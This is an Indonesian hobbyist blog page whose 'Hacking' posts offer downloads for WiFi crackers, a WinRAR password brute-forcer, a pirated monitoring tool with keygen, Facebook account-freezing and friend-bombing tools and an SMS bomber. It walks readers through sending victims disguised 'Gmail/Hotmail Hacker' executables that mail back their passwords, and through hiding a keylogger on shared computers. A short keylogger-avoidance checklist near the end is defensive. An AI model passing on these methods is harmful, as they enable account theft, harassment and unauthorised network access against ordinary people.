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Menerima Penginstalan PC / Laptop Untuk Daerah Makassar ,, Harga Murah Dan Terjangkau Khususnya Bagi Pelajar Dan Mahasiswa Daerah Makassar Dan Sekitarnya Alamat : Jl.AbubakarLambogo No 178 Pettarani Makassar Jl.Aspol Toddopuli Blok C20 Contact person : +628524138771 (Fh14n)

Tips Dan Trik Komputer

Komputer Sangat Banyak Yang bisa Kita pelajari dan banyak hal didalam komputer yang belum ketahui, Ayo ketahui Sekarang !.

Belajar Internet

Internet Begitu luas, ayo pelajari sekarang jangan sampai kita GaptekK ,, hahaha

Ngasal Aja Bro tapi Pas Kena Di Hati ,, hahaha

Jika cinta itu Sistem Operasi, maka, tak akan kubiarkan cinta ini terkena virus yang bisa mengganggu stabilitas dan eksistensinya sebagai sistem operasi yang tangguh. kalau perlu akan kugunakan sistem operasi yang kebal virus.

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Monday, April 29, 2013

Classroom Spy Professional 3.9.4 + Keygen

Dipersembahkan Oleh fhianjunior| Pada Selasa, April 30, 2013

Software Classroom Spy Professional 3.9.4 ini adalah software yang bisa kita gunakan untuk memonitor atau memantau komputer lain yang berada dalam 1 jaringan....software ini sangat cocok digunakan untuk guru guru yang mengajar di bagian Lab Komputer. Guru bisa dengan mudah memantau siswa dan komputer yang dipakainya....

Classroom Spy Professional 3.9.4 + Keygen

Sunday, April 28, 2013


AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. Whereas Aircrack can crack both WEP and WPA passwords, AirSnort has a limitation to cracking only WEP passwords.

Download here (Linux Users):



Winrar Password makes use of its powerful bruteforce and dictionary attack to crack the passwords of Winrar archives.

Download here:  


Password: hackingguide


Facebook Friend Bomber will enable you to add new facebook profiles automatically. FaceBook is the hottest thing which has 132 Million Users. This software includes Auto Mass Gather IDs, Auto Mass Friend Request and Poker, Auto Mass Messenger and Wall Poster. Because your business will be automated, you will be free to focus on marketing, and expansion. You can do what you want, when you want, when you get ready.  

Download here: 



This program can freeze facebook accounts temporarily or permanently by hitting facebook with consecutive wrong login attempts. It also has a "watch the action" feature in which we can see the facebook freezing process.

Download here:



This software will hack Gmail accounts. All you need is a bit of social engineering. Just follow the steps below:

1. Extract the RAR archive in a separate folder.
2. Run Gmail Hacker Builder.exe file on your computer.
3. Enter in your Gmail address and password (I created a new Gmail ID to test this and I recommend you to do the same). Hit on Build. Then Gmail hacker builder will create your own Gmail hacker application - Gmail Hacker.exe file which you can use to hack gmail password.
4. Now, send this Gmail Hacker.exe file to victim of which you wanna hack Gmail password and convince him that this Gmail hacker can hack Gmail password (Social Engineering as I already said).
5. Ask him to run Gmail Hacker.exe and enter all information including his Gmail ID and password and Gmail ID of victim he wanna hack. As he enters this information and hits "Hack Them", he will receive an error message
6. You will receive an email in your account containing his password. Enjoy!!!

Download here:



I had previously discussed about Gmail Hacker to hack Gmail accounts. Likewise, this software can hack Hotmail accounts. Just follow the steps below:

1. Extract the RAR archive in a separate folder.
2. Run Hotmail Hacker Builder.exe file on your computer.
3. Enter your email address, password and subject of email you wanna receive. I suggest you to create a new email ID for this. You can use Gmail or Yahoo but avoid using Hotmail account. This email will contain the password you wanna hack. Also select appropriate smtp server address. The default smtp server address 587 is of gmail. You can google for smtp server addresses or can find it here. Also, write a fake error message to display on the screen or leave it default.
4. Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.
5. Now, send this Hotmail Hacker.exe file to victim of which you wanna hack Hotmail password and convince him that this program can hack anyone's Hotmail password (lil bit of Social Engineering).
6. Ask him to run Hotmail Hacker.exe and enter all information including his Hotmail ID and password and Hotmail ID of victim he wanna hack. As he enters this information and hits "Login and Start", he will receive a error message.
7. You will receive an email in your account containing his password. Hooray!!! you will now be able to hack hotmail password. Enjoy!!!

Download here:



This program will bomb the victim's mobile phone with tons of SMS. It supports all major networks around the world. But if your network is not in the list, then don't worry, you can also add the carrier network with the help of "custom" option. You can also load list of multiple victims and bomb them simultaneously. The improvement that Beaver has made in this version over his previous SMS Bomber is that you can spoof the email address from which you are bombing the victim's mobile phone. For Example, If there was an error sending the message, it will ask you if you wanna change the E-mail/Password you are using. All credits to Beaver for this nice program.

Download here 


Download Wifi Cracker

post by fhian Junior 29-04-2013

Download Wifi Cracker 2010 All in One, perangkat lunak untuk membajak wifi yang ada passwordnya. Download koleksi lengkap semuanya ada disini.

AiroPeek NX v2.02
Wifi Drivers (Must Install)
Download Link dibawah ini:

Saturday, December 29, 2012

Cara Memasang dan Tips Pencegahan Keylogger

by fhian on 29,12,2012

      Pasti kalian Perna Dengar kata Keylogger Huft….aplikasi yang bernama asli “DRPU PC Data Manager” ini cukup dikenal dalam dunia Hacking. Dan membuat orang resa dibuatnya 

       Aplikasi Keylogger Adalah Salah satu Program tekenal Yang berfungsi mencatatat Aktivitas-aktivitas Keyboard. Mengerti ? Maksudnya Ketika Anda Menulis Suatu Kata dengan mengunakan keyboard Keylogger akan Mencatatnya 
contohnya ketika anda bermain di suatu warnet yang memiliki program ini dan anda Menulis Email dan Password di facebook, Keylogger akan Mencatatnya tanpa sepengetahuan anda ckckckc BERBAHAYAKAN. 
           Aplikasi ini biasanya dipasang diwarnet-warnet yang tidak bertanggung jawab gunanya mereka dapat melihat akun akun email facebook dll tanpa sepengetahuan anda dan jika anda memiliki banyak chips poker maka andalah sasaran empuk dari keylogger
Jika anda Tertarik dengan Keylogger anda dapat Mendownloadnya {disini}kemudian installah kelogger tesebut
Jika Tidak dapat Meng install aplikasinya berate anda Harus Mendownload FrameWork minimal versi 2 [ klik disini untuk download FrameWork] 
Gambarnya seperti ini

Keystrokes adalah Hasil dari apa yang kita tulis mengunakkan keyboard akan muncul disitu
Cara Menjalankan nya cukup mudah Tekan saja tombol “Start” di keylogger
Kemudian tekan  tombol Hide Supaya  keyloggernya seolah-olah hilang jadi siapa pun tdk akan curiga dan bakalan tau bila computer/ laptop anda telah dipasangkan Keylogger hahahaha Mengerikan

Cara Menghindari Keylogger
1.   Lihat Baik” apakah warnet yang anda kunjungi nda perna diGosipkan adanya Kelogger
2.   Lihat apakah deep freze masi berjalan kalau tidak lebih baik anda patut waspada
3.     Langkah periksa local diks C (C:\Program Files\DRPU PC Data Manager(Basic)) jika folder tersebut ada Segera   tanykan kepemilik warnet jika anda penakut Delete saja
4.     Perikasa juga All Programnya jika folder bernama DRPU PC Data Manager lebih baik haopus saja
5.     Langkah terakhir Bukalah Windows Taksmanager dengan menekan Ctrl +Alt + delete pada keyboard anda
6.     Jika terbuka Perhatikan Program dibawah
7.     Pililah Tab Processes kemudian cari Tulisan “pcdm.exe”  kemudian klik kanan End Process
8.     Jika anda mendapat pesan “TaksManager Has Disable By Admin User”  ketika membuka Taks Manager anda Patut curiga dan ada dapat pindah warnet lain
9. semuanya Gagal download aplikasi ini

Netcut & Anti Netcut Untuk Windows 7

Dipersembahkan Oleh Fhianjunior | Pada Minggu, Juli 18, 2010

Yang Ingin Mencoba Netcut dan anti Netcut untuk WINDOWS 7.... 